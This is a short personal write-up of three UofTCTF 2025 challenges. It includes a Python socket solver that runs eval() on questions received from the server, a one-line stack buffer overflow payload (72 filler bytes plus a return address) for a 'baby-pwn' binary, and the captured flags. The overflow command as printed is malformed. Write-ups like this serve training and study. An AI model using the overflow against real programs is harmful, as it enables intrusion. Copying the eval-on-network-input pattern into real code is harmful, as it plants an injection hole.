UofT CTF 2025 - Writeup • zenCipher

✨ Misc#

Sanity check#

Description

Welcome to UofTCTF 2025! Looking for the flag? Make sure you join the Discord server ↗. The flag format is uoftctf{…}.

Solve

This is just sanity check chall, so just input the flag that was given on discord.

Flag :

uoftctf{welcome_to_uoftctf_2025!!!!!}

plaintext

Math test#

Description

Complete this simple math test to get the flag. nc 34.66.235.106 5000 Author: White

---Attachment file---

Solve

In this challenge, i have to solve all math questions from the server. When i check into the source code, it’s endless 1000 questions with crazy numbers range💀💀. “I can’t doing ts for rest of competition”. So, i decided to make a solver script in python. In that script, it solve any questions from the server correctly. Just connect it with socket, and damnnn. you got the flag.

Here is my code to solve this 1000 math questions

solver.py

import socket
import re

def solve_math_problem(problem):
    try:
        return eval(problem)
    except ZeroDivisionError:
        return None


def main():
    host = "34.66.235.106"
    port = 5000

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))

        while True:
            data = s.recv(1024).decode()
            if not data:
                break
            
            print(data)

            match = re.search(r'Question: ([-+*//\d\s]+)', data)
            if match:
                problem = match.group(1).strip()
                print(f"Solving: {problem}")
                
                answer = solve_math_problem(problem)
                if answer is not None:
                    s.sendall(f"{int(answer)}\n".encode())
                else:
                    print("Zero division error occurred.")
                    break

            # Print the flag 
            if "Congratz!" in data:
                print(data)
                break

if __name__ == "__main__":
    main()

python

Flag :

uoftctf{7h15_15_b451c_10_7357_d16u153d_45_4_m47h_7357}

plaintext

💻 Pwn#

baby-pwn#

Description

Here’s a baby pwn challenge for you to try out. Can you get the flag? nc 34.162.142.123 5000 Author: atom

Solve

As we see at first, this challenge provide the source code and compiled one. We can buffer overflow this chall by passing some 64 + 8 bit input

python3 -c 'print("A" * 64 + "B" * 8 + \x66\x11\x40\x00\x00\x00\x00\x00)' | ./chal

bash

You can change the ”./chal” with netcat or the original program. Once we run the payload, we’ll get this flag

Flag :

uoftctf{buff3r_0v3rfl0w5_4r3_51mp13_1f_y0u_kn0w_h0w_t0_d0_1t}

plaintext

Thanks for read this writeup. If u wanna support me, buy me a coffee here ↗ or click button below